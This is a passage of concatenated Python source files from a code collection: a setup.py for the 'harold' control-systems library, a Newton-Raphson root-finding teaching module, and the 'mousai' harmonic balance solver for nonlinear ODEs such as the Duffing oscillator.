raise RuntimeError("Python version >= 3.6 required.")
MAJOR = 1
MINOR = 0
MICRO = 2
ISRELEASED = False
VERSION = '{}.{}.{}'.format(MAJOR, MINOR, MICRO)
# Return the git revision as a string
def git_version():
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.Popen(cmd, stdout=subprocess.PIPE,
env=env).communicate()[0]
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
GIT_REVISION = out.strip().decode('ascii')
except OSError:
GIT_REVISION = "Unknown"
return GIT_REVISION
def get_version_info():
FULLVERSION = VERSION
if os.path.exists('.git'):
GIT_REVISION = git_version()
elif os.path.exists('harold/_version.py'):
# must be a source distribution, use existing version file
        # load it as a separate module to not load harold/__init__.py
import imp
version = imp.load_source('harold._version', 'harold/_version.py')
GIT_REVISION = version.git_revision
else:
GIT_REVISION = "Unknown"
if not ISRELEASED:
FULLVERSION += '.dev0+' + GIT_REVISION[:7]
return FULLVERSION, GIT_REVISION
def write_version_py(filename='harold/_version.py'):
FULLVERSION, GIT_REVISION = get_version_info()
s = (f'''# THIS FILE IS AUTO-GENERATED FROM SETUP.PY\n'''
f'''short_version = "{VERSION}"\n'''
f'''version = "{VERSION}"\n'''
f'''full_version = "{FULLVERSION}"\n'''
f'''git_revision = "{GIT_REVISION}"\n'''
f'''release = {ISRELEASED}\n'''
f'''if not release:\n'''
f''' version = full_version\n''')
a = open(filename, 'w')
try:
a.write(s)
finally:
a.close()
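# Illustration (added; not part of the original file): with the constants
# above and a hypothetical revision 'abc1234...', write_version_py emits
#   short_version = "1.0.2"
#   version = "1.0.2"
#   full_version = "1.0.2.dev0+abc1234"
#   git_revision = "abc1234..."
#   release = False
#   if not release:
#       version = full_version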
# =============================
# Back to setup.py declarations
# =============================
here = abspath(dirname(__file__))
# Get the long description from the relevant file
def read(*filenames, **kwargs):
encoding = kwargs.get('encoding', 'utf-8')
sep = kwargs.get('sep', '\n')
buf = []
for filename in filenames:
with io.open(filename, encoding=encoding) as f:
buf.append(f.read())
return sep.join(buf)
long_description = read('README.rst', 'CHANGES.txt')
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS'
]
def setup_package():
write_version_py()
setup(
name='harold',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/ilayn/harold',
description='A control systems library for Python3',
long_description=long_description,
license='MIT',
classifiers=CLASSIFIERS,
packages=['harold'],
package_dir={'harold': 'harold'},
python_requires='>=3.6',
install_requires=['numpy', 'scipy', 'matplotlib', 'tabulate'],
setup_requires=['pytest-runner'],
tests_require=['numpy', 'pytest'],
keywords='control-theory PID controller design industrial automation',
extras_require={
'dev': ['check-manifest'],
'test': ['coverage'],
'docs': ['sphinx>=1.7.4', 'cloud-sptheme>=1.9.4', 'numpydoc']
},
version=get_version_info()[0]
)
if __name__ == '__main__':
setup_package()
``` |
{
"source": "josephcslater/JupyterExamples",
"score": 5
} |
#### File: josephcslater/JupyterExamples/newton_raphson.py
```python
import matplotlib.pyplot as plt
import numpy as np
def myfunc(x):
"""
Generic function.
Parameters
----------
x: float or array_like
The value or array at which to calculate the function
Examples
--------
Execution on a float
>>> from newton_raphson import *
>>> myfunc(3.0)
11.0
    Execution on a NumPy array
>>> a = np.linspace(0,10,10)
>>> myfunc(a)
array([ -4. , -0.54320988, 5.38271605, 13.77777778,
24.64197531, 37.97530864, 53.77777778, 72.04938272,
92.79012346, 116. ])
"""
return x**2+2*x-4
def newton_raphson_plot(function, x0=0, dx=1e-10, eps=1e-10):
"""
Solve for a root of a function using Newton Raphson's method.
Also plots the process.
Parameters
----------
function : string
String with name of function to be solved for *function(x) = 0*
x0 : float
Initial guess for *x* near *function(x) = 0*
dx : float
Delta x used for finite difference calculation of slope
eps : float
Absolute value of *function(x)* which is considered zero.
Examples
--------
>>> from newton_raphson import *
>>> def myfunc(x):
... return x**2+2*x-4
>>> function_name = 'myfunc'
>>> newton_raphson_plot(function_name, x0=2)
(1.23606797..., ...)
"""
deltax = 2 * eps
count = 0
x = x0
y = np.linspace(1, 6, 200)
plt.plot(y, globals()[function](y))
plt.ylabel('$f(x)$')
plt.xlabel('$x$')
plt.title('Newton Raphson search for solution to $f(x)=0$.')
plt.grid(True)
plt.plot(np.array([x0, x0]), np.array([globals()[function](x0), 0]), 'r')
plt.plot(np.array([x0]), np.array([globals()[function](x0)]), 'r*')
while abs(globals()[function](x)) > eps and count < 50:
count += 1
plt.plot(np.array([x, x]), np.array([globals()[function](x), 0]), 'r')
plt.plot(np.array([x]), np.array([globals()[function](x)]), 'r*')
f = globals()[function](x)
f2 = globals()[function](x + dx)
dfdx = (f2 - f) / dx
deltax = -f / dfdx
x = x + deltax
xr = np.linspace(x, x - deltax, 200)
y = xr * dfdx - x * dfdx
        plt.plot(xr, y, 'y')  # Tangent line used for this update
return x, deltax
def newton_raphson(function, x0=0, dx=1e-10, eps=1e-10):
"""
Solve for a root of a function using Newton Raphson's method.
Parameters
----------
function : string
String with name of function to be solved for *function(x) = 0*
x0 : float
Initial guess for *x* near *function(x) = 0*
dx : float
Delta x used for finite difference calculation of slope
eps : float
Absolute value of *function(x)* which is considered zero.
Examples
--------
>>> from newton_raphson import *
>>> def myfunc(x):
... return x**2+2*x-4
>>> function_name = 'myfunc'
>>> newton_raphson(function_name, x0=2)
(1.2360679..., ...)
"""
deltax = 2*eps
count = 0
x = x0
# loop until it converges, but no more than 50 times
while abs(deltax) > eps and count < 50:
count += 1 # I can add 1 to the variable *count*. Neat Python shortcut.
# This is a comment
# The next line is "Matlab style" and *bad*
#f = eval(function + '('+ str(x) + ')')
f = globals()[function](x) #We explain later.
#f2 = eval(function + '('+ str(x+dx) + ')')
f2 = globals()[function](x+dx)
dfdx = (f2-f)/dx
deltax = -f/dfdx
x = x + deltax
return x, deltax
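# Minimal usage sketch (added for illustration; not in the original module):
# solve myfunc(x) = 0 starting from x0 = 2. The positive root of
# x**2 + 2*x - 4 is sqrt(5) - 1, approximately 1.2360679.
def _demo_newton_raphson():
    root, last_step = newton_raphson('myfunc', x0=2)
    print('root = {:.10f}, final step = {:.2e}'.format(root, last_step))
    return root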
``` |
{
"source": "josephcslater/mousai",
"score": 3
} |
#### File: mousai/mousai/har_bal.py
```python
import warnings
# import logging
import numpy as np
import scipy as sp
import scipy.fftpack as fftp
import scipy.linalg as la
import inspect
from scipy.optimize import newton_krylov, anderson, broyden1, broyden2, \
excitingmixing, linearmixing, diagbroyden
# logging.basicConfig(level=print)
# Use `logging.debug` in place of print.
# for instance logging.debug(pformat('e {} X {}'.format(e,X)))
# This will output only info and warnings
# logging.basicConfig(level=logging.INFO)
# This will output only warnings
# logging.basicConfig(level=logging.WARNING)
def hb_time(sdfunc, x0=None, omega=1, method='newton_krylov', num_harmonics=1,
num_variables=None, eqform='second_order', params={}, realify=True,
**kwargs):
r"""Harmonic balance solver for first and second order ODEs.
Obtains the solution of a first-order and second-order differential
equation under the presumption that the solution is harmonic using an
algebraic time method.
Returns `t` (time), `x` (displacement), `v` (velocity), and `a`
(acceleration) response of a first- or second- order linear ordinary
differential equation defined by
:math:`\ddot{\mathbf{x}}=f(\mathbf{x},\mathbf{v},\omega)` or
:math:`\dot{\mathbf{x}}=f(\mathbf{x},\omega)`.
For the state space form, the function `sdfunc` should have the form::
def duff_osc_ss(x, params): # params is a dictionary of parameters
omega = params['omega'] # `omega` will be put into the dictionary
# for you
t = params['cur_time'] # The time value is available as
# `cur_time` in the dictionary
xdot = np.array([[x[1]],[-x[0]-.1*x[0]**3-.1*x[1]+1*np.sin(omega*t)]])
return xdot
In a state space form solution, the function must accept the states and the
`params` dictionary. This dictionary should be used to obtain the
prescribed response frequency and the current time. These plus any other
parameters are used to calculate the state derivatives which are returned
by the function.
For the second order form the function `sdfunc` should have the form::
def duff_osc(x, v, params): # params is a dictionary of parameters
omega = params['omega'] # `omega` will be put into the dictionary
# for you
t = params['cur_time'] # The time value is available as
# `cur_time` in the dictionary
return np.array([[-x-.1*x**3-.2*v+np.sin(omega*t)]])
In a second-order form solution the function must take the states and the
`params` dictionary. This dictionary should be used to obtain the
prescribed response frequency and the current time. These plus any other
parameters are used to calculate the state derivatives which are returned
by the function.
Parameters
----------
sdfunc : function
For `eqform='first_order'`, name of function that returns **column
        vector** first derivative given `x`, and a dictionary of parameters.
This is *NOT* a string (not the name of the function).
:math:`\dot{\mathbf{x}}=f(\mathbf{x},\omega)`
For `eqform='second_order'`, name of function that returns **column
vector** second derivative given `x`, `v`, and a dictionary of
parameters. This is *NOT* a string.
:math:`\ddot{\mathbf{x}}=f(\mathbf{x},\mathbf{v},\omega)`
x0 : array_like, somewhat optional
n x m array where n is the number of equations and m is the number of
values representing the repeating solution.
It is required that :math:`m = 1 + 2 num_{harmonics}`. (we will
generalize allowable default values later.)
omega : float
assumed fundamental response frequency in radians per second.
method : str, optional
Name of optimization method to be used.
num_harmonics : int, optional
Number of harmonics to presume. The omega = 0 constant term is always
presumed to exist. Minimum (and default) is 1. If num_harmonics*2+1
exceeds the number of columns of `x0` then `x0` will be expanded, using
        Fourier analysis, to include additional harmonics with the starting
presumption of zero values.
num_variables : int, somewhat optional
Number of states for a state space model, or number of generalized
        displacements for a second order form.
If `x0` is defined, num_variables is inferred. An error will result if
both `x0` and num_variables are left out of the function call.
`num_variables` must be defined if `x0` is not.
eqform : str, optional
`second_order` or `first_order`. (second order is default)
params : dict, optional
Dictionary of parameters needed by sdfunc.
realify : boolean, optional
Force the returned results to be real.
other : any
Other keyword arguments available to nonlinear solvers in
`scipy.optimize.nonlin
<https://docs.scipy.org/doc/scipy/reference/optimize.nonlin.html>`_.
See `Notes`.
Returns
-------
t, x, e, amps, phases : array_like
time, displacement history (time steps along columns), errors,
amps : float array
amplitudes of displacement (primary harmonic) in column vector format.
phases : float array
        phases of displacement (primary harmonic) in column vector format.
Examples
--------
>>> import mousai as ms
>>> t, x, e, amps, phases = ms.hb_time(ms.duff_osc,
... np.array([[0,1,-1]]),
... omega = 0.7)
Notes
-----
.. seealso::
``hb_freq``
This method is not reliable for a low number of harmonics.
    Calls a nonlinear solver from
`scipy.optimize.nonlin
<https://docs.scipy.org/doc/scipy/reference/optimize.nonlin.html>`_ with
`newton_krylov` as the default.
Evaluates the differential equation/s at evenly spaced points in time. Each
point in time yields a single equation. One harmonic plus the constant term
results in 3 points in time over the cycle.
Solver should gently "walk" solution up to get to nonlinearities for hard
nonlinearities.
Algorithm:
1. calls `hb_err` with `x` as the variable to solve for.
2. `hb_err` uses a Fourier representation of `x` to obtain
velocities (after an inverse FFT) then calls `sdfunc` to determine
accelerations.
3. Accelerations are also obtained using a Fourier representation of x
4. Error in the accelerations (or state derivatives) are the functional
error used by the nonlinear algebraic solver
(default `newton_krylov`) to be minimized by the solver.
Options to the nonlinear solvers can be passed in by \*\*kwargs (keyword
arguments) identical to those available to the nonlinear solver.
"""
# Initial conditions exist?
if x0 is None:
if num_variables is not None:
x0 = np.zeros((num_variables, 1 + num_harmonics * 2))
else:
            print('Error: Must either define number of variables or initial '
                  'guess for x.')
return
elif num_harmonics is None:
num_harmonics = int((x0.shape[1] - 1) / 2)
elif 1 + 2 * num_harmonics > x0.shape[1]:
x_freq = fftp.fft(x0)
x_zeros = np.zeros((x0.shape[0], 1 + num_harmonics * 2 - x0.shape[1]))
x_freq = np.insert(x_freq, [x0.shape[1] - x0.shape[1] // 2], x_zeros,
axis=1)
x0 = fftp.ifft(x_freq) * (1 + num_harmonics * 2) / x0.shape[1]
x0 = np.real(x0)
if isinstance(sdfunc, str):
sdfunc = globals()[sdfunc]
print("sdfunc is expected to be a function name, not a string")
params['function'] = sdfunc # function that returns SO derivative
time = np.linspace(0, 2 * np.pi / omega, num=x0.shape[1], endpoint=False)
params['time'] = time
params['omega'] = omega
params['n_har'] = num_harmonics
def hb_err(x):
r"""Array (vector) of hamonic balance second order algebraic errors.
Given a set of second order equations
:math:`\ddot{x} = f(x, \dot{x}, \omega, t)`
calculate the error :math:`E = \ddot{x} - f(x, \dot{x}, \omega, t)`
presuming that :math:`x` can be represented as a Fourier series, and
thus :math:`\dot{x}` and :math:`\ddot{x}` can be obtained from the
Fourier series representation of :math:`x`.
Parameters
----------
x : array_like
            x is an :math:`n \times m` array of presumed displacements.
It must be a "list" array (not a linear algebra vector). Here
:math:`n` is the number of displacements and :math:`m` is the
number of times per cycle at which the displacement is guessed
(minimum of 3)
params : dictionary
Because this function will be called by one of the scipy.optimize
root finders, it must be a function of only `x`. However, for
            generality it needs to be built based on user-defined variables.
            These variables must be in the scope of memory when the function is
            created. For convenience they are stored in the variable `params`.
1. `function`: the function which returns the numerically
calculated state derivatives (or second derivatives) given the
states (or states and first derivatives).
2. `omega`: which is the defined fundamental harmonic
at which the solution is desired.
3. `n_har`: an integer representing the number of harmonics.
Note that `m` above is equal to 1 + 2 * `n_har`.
Returns
-------
e : array_like
2d array of numerical error of presumed solution(s) `x`.
Notes
-----
`function` and `omega` are not separately defined arguments so as to
enable algebraic solver functions to call `hb_time_err` cleanly.
The algorithm is broadly as follows:
        1. The velocities or accelerations are calculated in the same shape
           as `x` as the variables `vel` and `accel`, one column for each
           time step.
        2. Each column of `x` and `v` is sent with `t`, `omega`, and other
           `**kwargs` to `function`, with the results
           aggregated into the columns of `accel_num`.
        3. The difference between `accel_num` and `accel` (or
           `velocity_num` and `velocity`) represents the error used
           by the numerical algebraic equation solver.
"""
nonlocal params # Will stay out of global/conflicts
n_har = params['n_har']
omega = params['omega']
time = params['time']
m = 1 + 2 * n_har
vel = harmonic_deriv(omega, x)
if eqform == 'second_order':
accel = harmonic_deriv(omega, vel)
accel_from_deriv = np.zeros_like(accel)
# Should subtract in place below to save memory for large problems
for i in np.arange(m):
# This should enable t to be used for current time in loops
# might be able to be commented out, left as example
t = time[i]
params['cur_time'] = time[i] # loops
# Note that everything in params can be accessed within
# `function`.
accel_from_deriv[:, i] = params['function'](x[:, i], vel[:, i],
params)[:, 0]
e = accel_from_deriv - accel
elif eqform == 'first_order':
vel_from_deriv = np.zeros_like(vel)
# Should subtract in place below to save memory for large problems
for i in np.arange(m):
# This should enable t to be used for current time in loops
t = time[i]
params['cur_time'] = time[i]
# Note that everything in params can be accessed within
# `function`.
vel_from_deriv[:, i] =\
params['function'](x[:, i], params)[:, 0]
e = vel_from_deriv - vel
else:
            print('eqform cannot have a value of {}'.format(eqform))
return 0, 0, 0, 0, 0
return e
try:
x = globals()[method](hb_err, x0, **kwargs)
except:
x = x0 # np.full([x0.shape[0],x0.shape[1]],np.nan)
amps = np.full([x0.shape[0], ], np.nan)
phases = np.full([x0.shape[0], ], np.nan)
e = hb_err(x) # np.full([x0.shape[0],x0.shape[1]],np.nan)
raise
else:
xhar = fftp.fft(x) * 2 / len(time)
amps = np.absolute(xhar[:, 1])
phases = np.angle(xhar[:, 1])
e = hb_err(x)
if realify is True:
x = np.real(x)
else:
print('x was real')
return time, x, e, amps, phases
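# Usage sketch (added for illustration; mirrors the docstring example): solve
# the Duffing oscillator defined later in this module at omega = 0.7 rad/s
# with one presumed harmonic (three time points per cycle).
def _demo_hb_time():
    t, x, e, amps, phases = hb_time(duff_osc, np.array([[0., 1., -1.]]),
                                    omega=0.7)
    return amps, phases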
def hb_freq(sdfunc, x0=None, omega=1, method='newton_krylov', num_harmonics=1,
num_variables=None, mask_constant=True, eqform='second_order',
params={}, realify=True, num_time_steps=51, **kwargs):
r"""Harmonic balance solver for first and second order ODEs.
Obtains the solution of a first-order and second-order differential
equation under the presumption that the solution is harmonic using an
algebraic time method.
Returns `t` (time), `x` (displacement), `v` (velocity), and `a`
(acceleration) response of a first or second order linear ordinary
differential equation defined by
:math:`\ddot{\mathbf{x}}=f(\mathbf{x},\mathbf{v},\omega)` or
:math:`\dot{\mathbf{x}}=f(\mathbf{x},\omega)`.
For the state space form, the function `sdfunc` should have the form::
def duff_osc_ss(x, params): # params is a dictionary of parameters
omega = params['omega'] # `omega` will be put into the dictionary
# for you
t = params['cur_time'] # The time value is available as
# `cur_time` in the dictionary
x_dot = np.array([[x[1]],
[-x[0]-.1*x[0]**3-.1*x[1]+1*np.sin(omega*t)]])
return x_dot
In a state space form solution, the function must take the states and the
`params` dictionary. This dictionary should be used to obtain the
prescribed response frequency and the current time. These plus any other
parameters are used to calculate the state derivatives which are returned
by the function.
For the second order form the function `sdfunc` should have the form::
def duff_osc(x, v, params): # params is a dictionary of parameters
omega = params['omega'] # `omega` will be put into the dictionary
# for you
t = params['cur_time'] # The time value is available as
# `cur_time` in the dictionary
return np.array([[-x-.1*x**3-.2*v+np.sin(omega*t)]])
In a second-order form solution the function must take the states and the
`params` dictionary. This dictionary should be used to obtain the
prescribed response frequency and the current time. These plus any other
parameters are used to calculate the state derivatives which are returned
by the function.
Parameters
----------
sdfunc : function
For `eqform='first_order'`, name of function that returns **column
        vector** first derivative given `x`, and a dictionary of parameters.
This is *NOT* a string (not the name of the function).
:math:`\dot{\mathbf{x}}=f(\mathbf{x},\omega)`
For `eqform='second_order'`, name of function that returns **column
vector** second derivative given `x`, `v`, `omega` and \*\*kwargs. This
is *NOT* a string.
:math:`\ddot{\mathbf{x}}=f(\mathbf{x},\mathbf{v},\omega)`
x0 : array_like, somewhat optional
n x m array where n is the number of equations and m is the number of
values representing the repeating solution.
It is required that :math:`m = 1 + 2 num_{harmonics}`. (we will
generalize allowable default values later.)
omega : float
assumed fundamental response frequency in radians per second.
method : str, optional
Name of optimization method to be used.
num_harmonics : int, optional
Number of harmonics to presume. The `omega` = 0 constant term is always
presumed to exist. Minimum (and default) is 1. If num_harmonics*2+1
exceeds the number of columns of `x0` then `x0` will be expanded, using
        Fourier analysis, to include additional harmonics with the starting
presumption of zero values.
num_variables : int, somewhat optional
Number of states for a state space model, or number of generalized
        displacements for a second order form.
If `x0` is defined, num_variables is inferred. An error will result if
both `x0` and num_variables are left out of the function call.
`num_variables` must be defined if `x0` is not.
eqform : str, optional
        `second_order` or `first_order`. (`second_order` is the default)
params : dict, optional
Dictionary of parameters needed by sdfunc.
realify : boolean, optional
Force the returned results to be real.
mask_constant : boolean, optional
Force the constant term of the series representation to be zero.
num_time_steps : int, default = 51
number of time steps to use in time histories for derivative
calculations.
other : any
Other keyword arguments available to nonlinear solvers in
`scipy.optimize.nonlin
<https://docs.scipy.org/doc/scipy/reference/optimize.nonlin.html>`_.
See Notes.
Returns
-------
t, x, e, amps, phases : array_like
time, displacement history (time steps along columns), errors,
amps : float array
amplitudes of displacement (primary harmonic) in column vector format.
phases : float array
        phases of displacement (primary harmonic) in column vector format.
Examples
--------
>>> import mousai as ms
>>> t, x, e, amps, phases = ms.hb_freq(ms.duff_osc,
... np.array([[0,1,-1]]),
... omega = 0.7)
Notes
-----
.. seealso::
`hb_time`
    Calls a nonlinear solver from
`scipy.optimize.nonlin
<https://docs.scipy.org/doc/scipy/reference/optimize.nonlin.html>`_ with
`newton_krylov` as the default.
    Evaluates the differential equation(s) at evenly spaced points in time
    defined by the user (default 51). Uses the error in the FFT of the
    derivative (acceleration or state equations) calculated based on:
1. governing equations
2. derivative of `x` (second derivative for state method)
Solver should gently "walk" solution up to get to nonlinearities for hard
nonlinearities.
Algorithm:
    1. calls `hb_err` with `x` as the variable to solve for.
    2. `hb_err` uses a Fourier representation of `x` to obtain
velocities (after an inverse FFT) then calls `sdfunc` to determine
accelerations.
3. Accelerations are also obtained using a Fourier representation of x
4. Error in the accelerations (or state derivatives) are the functional
error used by the nonlinear algebraic solver
(default `newton_krylov`) to be minimized by the solver.
Options to the nonlinear solvers can be passed in by \*\*kwargs.
"""
# Initial conditions exist?
if x0 is None:
if num_variables is not None:
x0 = np.zeros((num_variables, 1 + num_harmonics * 2))
x0 = x0 + np.random.randn(*x0.shape)
else:
            print('Error: Must either define number of variables or initial '
                  'guess for x.')
return
elif num_harmonics is None:
num_harmonics = int((x0.shape[1] - 1) / 2)
elif 1 + 2 * num_harmonics > x0.shape[1]:
x_freq = fftp.fft(x0)
x_zeros = np.zeros((x0.shape[0], 1 + num_harmonics * 2 - x0.shape[1]))
x_freq = np.insert(x_freq, [x0.shape[1] - x0.shape[1] // 2], x_zeros,
axis=1)
x0 = fftp.ifft(x_freq) * (1 + num_harmonics * 2) / x0.shape[1]
x0 = np.real(x0)
if isinstance(sdfunc, str):
sdfunc = globals()[sdfunc]
print("sdfunc is expected to be a function name, not a string")
params['function'] = sdfunc # function that returns SO derivative
time = np.linspace(0, 2 * np.pi / omega, num=x0.shape[1], endpoint=False)
params['time'] = time
params['omega'] = omega
params['n_har'] = num_harmonics
X0 = fftp.rfft(x0)
if mask_constant is True:
X0 = X0[:, 1:]
params['mask_constant'] = mask_constant
def hb_err(X):
"""Return errors in equation eval versus derivative calculation."""
# r"""Array (vector) of hamonic balance second order algebraic errors.
#
# Given a set of second order equations
# :math:`\ddot{x} = f(x, \dot{x}, \omega, t)`
# calculate the error :math:`E = \mathcal{F}(\ddot{x}
# - \mathcal{F}\left(f(x, \dot{x}, \omega, t)\right)`
# presuming that :math:`x` can be represented as a Fourier series, and
# thus :math:`\dot{x}` and :math:`\ddot{x}` can be obtained from the
# Fourier series representation of :math:`x` and :math:`\mathcal{F}(x)`
# represents the Fourier series of :math:`x(t)`
#
# Parameters
# ----------
# X : float array
        #     X is an :math:`n \times m` array of fftp.rfft
        #     coefficients lacking the constant (first) element.
        #     Here :math:`n` is the number of displacements and :math:`m` is
        #     2 times the number of harmonics to be solved for.
#
# **kwargs : string, float, variable
# **kwargs is a packed set of keyword arguments with 3 required
# arguments.
# 1. `function`: a string name of the function which returned
# the numerically calculated acceleration.
#
# 2. `omega`: which is the defined fundamental harmonic
        #        at which the solution is desired.
#
# 3. `n_har`: an integer representing the number of harmonics.
# Note that `m` above is equal to 2 * `n_har`.
#
# Returns
# -------
# e : float array
# 2d array of numerical errors of presumed solution(s) `X`. Error
# between first (or second) derivative via Fourier analysis and via
# solution of the governing equation.
#
# Notes
# -----
# `function` and `omega` are not separately defined arguments so as to
# enable algebraic solver functions to call `hb_err` cleanly.
#
# The algorithm is as follows:
# 1. X is prepended with a zero vector (to represent the constant
# value)
# 2. `x` is calculated via an inverse `numpy.fft.rfft`
# 1. The velocity and accelerations are calculated in the same
# shape as `x` as `vel` and `accel`.
# 3. Each column of `x` and `v` are sent with `t`, `omega`, and
        #     other `**kwargs` to `function` one at a time with the results
        #     aggregated into the columns of `accel_num`.
# 4. The rfft is taken of `accel_num` and `accel`.
        #     5. The first column is stripped out of both `accel_num_freq` and
        #        `accel_freq`.
# """
nonlocal params # Will stay out of global/conflicts
omega = params['omega']
time = params['time']
mask_constant = params['mask_constant']
if mask_constant is True:
X = np.hstack((np.zeros_like(X[:, 0]).reshape(-1, 1), X))
x = fftp.irfft(X)
time_e, x = time_history(time, x, num_time_points=num_time_steps)
vel = harmonic_deriv(omega, x)
m = num_time_steps
if eqform == 'second_order':
accel = harmonic_deriv(omega, vel)
accel_from_deriv = np.zeros_like(accel)
# Should subtract in place below to save memory for large problems
for i in np.arange(m):
# This should enable t to be used for current time in loops
# might be able to be commented out, left as example
# t = time_e[i]
params['cur_time'] = time_e[i] # loops
# Note that everything in params can be accessed within
# `function`.
accel_from_deriv[:, i] = params['function'](x[:, i], vel[:, i],
params)[:, 0]
e = (accel_from_deriv - accel) # /np.max(np.abs(accel))
states = accel
elif eqform == 'first_order':
vel_from_deriv = np.zeros_like(vel)
# Should subtract in place below to save memory for large problems
for i in np.arange(m):
# This should enable t to be used for current time in loops
# t = time_e[i]
params['cur_time'] = time_e[i]
# Note that everything in params can be accessed within
# `function`.
vel_from_deriv[:, i] =\
params['function'](x[:, i], params)[:, 0]
e = (vel_from_deriv - vel) # /np.max(np.abs(vel))
states = vel
else:
            print('eqform cannot have a value of {}'.format(eqform))
return 0, 0, 0, 0, 0
states_fft = fftp.rfft(states)
e_fft = fftp.rfft(e)
states_fft_condensed = condense_rfft(states_fft, num_harmonics)
e = condense_rfft(e_fft, num_harmonics)
if mask_constant is True:
e = e[:, 1:]
e = e / np.max(np.abs(states_fft_condensed))
return e
try:
X = globals()[method](hb_err, X0, **kwargs)
e = hb_err(X)
if mask_constant is True:
X = np.hstack((np.zeros_like(X[:, 0]).reshape(-1, 1), X))
amps = np.sqrt(X[:, 1]**2 + X[:, 2]**2) * 2 / X.shape[1]
phases = np.arctan2(X[:, 1], -X[:, 2])
except: # Catches and raises errors- needs actual error listed.
        print(
            'Exception: search failed for omega = {:6.4f} rad/s.'.format(omega))
        print("""Whatever error this is, please put into har_bal
              after the excepts (2 of them)""")
X = X0
print(mask_constant)
e = hb_err(X)
if mask_constant is True:
X = np.hstack((np.zeros_like(X[:, 0]).reshape(-1, 1), X))
amps = np.sqrt(X[:, 1]**2 + X[:, 2]**2) * 2 / X.shape[1]
phases = np.arctan2(X[:, 1], -X[:, 2])
raise
x = fftp.irfft(X)
if realify is True:
x = np.real(x)
else:
print('x was real')
return time, x, e, amps, phases
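# Usage sketch (added for illustration; mirrors the docstring example): the
# frequency-domain solver takes the same arguments; mask_constant=True (the
# default) pins the constant Fourier term to zero during the solve.
def _demo_hb_freq():
    t, x, e, amps, phases = hb_freq(duff_osc, np.array([[0., 1., -1.]]),
                                    omega=0.7)
    return amps, phases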
def hb_so(sdfunc, **kwargs):
"""Deprecated function name. Use hb_time."""
message = 'hb_so is deprecated. Please use hb_time or an alternative.'
warnings.warn(message, DeprecationWarning)
    return hb_time(sdfunc, **kwargs)
def harmonic_deriv(omega, r):
r"""Return derivative of a harmonic function using frequency methods.
Parameters
----------
omega: float
        Fundamental frequency, in rad/s, of the repeating signal
r: array_like
| Array of rows of time histories to take the derivative of.
| The 1 axis (each row) corresponds to a time history.
| The length of the time histories *must be an odd integer*.
Returns
-------
s: array_like
Function derivatives.
The 1 axis (each row) corresponds to a time history.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from mousai import *
>>> import scipy as sp
>>> from numpy import pi, sin, cos
>>> f = 2
>>> omega = 2.*pi * f
>>> numsteps = 11
>>> t = np.arange(0,1/omega*2*pi,1/omega*2*pi/numsteps)
>>> x = np.array([sin(omega*t)])
>>> v = np.array([omega*cos(omega*t)])
>>> states = np.append(x,v,axis = 0)
>>> state_derives = harmonic_deriv(omega,states)
>>> plt.plot(t,states.T,t,state_derives.T,'x')
[<matplotlib.line...]
"""
s = np.zeros_like(r)
for i in np.arange(r.shape[0]):
s[i, :] = fftp.diff(r[i, :]) * omega
return np.real(s)
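# Quick self-check (added for illustration): sampling sin(omega*t) over one
# period with an odd number of points, harmonic_deriv should reproduce
# omega*cos(omega*t) to machine precision, since the differentiation is
# spectral.
def _check_harmonic_deriv(omega=2 * np.pi, n=11):
    t = np.linspace(0, 2 * np.pi / omega, n, endpoint=False)
    x = np.sin(omega * t)[None, :]
    v = harmonic_deriv(omega, x)
    return np.allclose(v, omega * np.cos(omega * t))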
def solmf(x, v, M, C, K, F):
r"""Return acceleration of second order linear matrix system.
Parameters
----------
x, v, F : array_like
:math:`n\times 1` arrays of current displacement, velocity, and Force.
M, C, K : array_like
Mass, damping, and stiffness matrices.
Returns
-------
a : array_like
        :math:`n\times 1` acceleration vector
Examples
--------
>>> import numpy as np
>>> M = np.array([[2,0],[0,1]])
>>> K = np.array([[2,-1],[-1,3]])
>>> C = 0.01 * M + 0.01 * K
>>> x = np.array([[1],[0]])
>>> v = np.array([[0],[10]])
>>> F = v * 0.1
>>> a = solmf(x, v, M, C, K, F)
>>> print(a)
[[-0.95]
[ 1.6 ]]
"""
return -la.solve(M, C @ v + K @ x - F)
def duff_osc(x, v, params):
"""Duffing oscillator acceleration."""
omega = params['omega']
t = params['cur_time']
acceleration = np.array([[-x - .1 * x**3. - 0.2 * v + np.sin(omega * t)]])
return acceleration
def time_history(t, x, num_time_points=200, realify=True):
r"""Generate refined time history from harmonic balance solution.
Harmonic balance solutions presume a limited number of harmonics in the
solution. The result is that the time history is usually a very limited
number of values. Plotting these results implies that the solution isn't
actually a continuous one. This function fills in the gaps using the
harmonics obtained in the solution.
Parameters
----------
t: array_like
1 x m array where m is the number of
values representing the repeating solution.
x: array_like
        n x m array where n is the number of equations and m is the number of
values representing the repeating solution.
realify: boolean
Force the returned results to be real.
num_time_points: int
number of points desired in the "smooth" time history.
Returns
-------
t: array_like
1 x num_time_points array.
x: array_like
n x num_time_points array.
Examples
--------
>>> import numpy as np
>>> import mousai as ms
>>> x = np.array([[-0.34996499, 1.36053998, -1.11828552]])
>>> t = np.array([0. , 2.991993 , 5.98398601])
>>> t_full, x_full = ms.time_history(t, x, num_time_points=300)
Notes
-----
The implication of this function is that the higher harmonics that
were not determined in the solution are zero. This is indeed the assumption
made when setting up the harmonic balance solution. Whether this is a valid
assumption is something that the user must judge when obtaining the
solution.
"""
dt = t[1]
t_length = t.size
t = np.linspace(0, t_length * dt, num_time_points, endpoint=False)
x_freq = fftp.fft(x)
x_zeros = np.zeros((x.shape[0], t.size - x.shape[1]))
x_freq = np.insert(x_freq, [t_length - t_length // 2], x_zeros, axis=1)
x = fftp.ifft(x_freq) * num_time_points / t_length
if realify is True:
x = np.real(x)
else:
print('x was real')
return t, x
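# Illustration (added; not in the original module): refine the three-point
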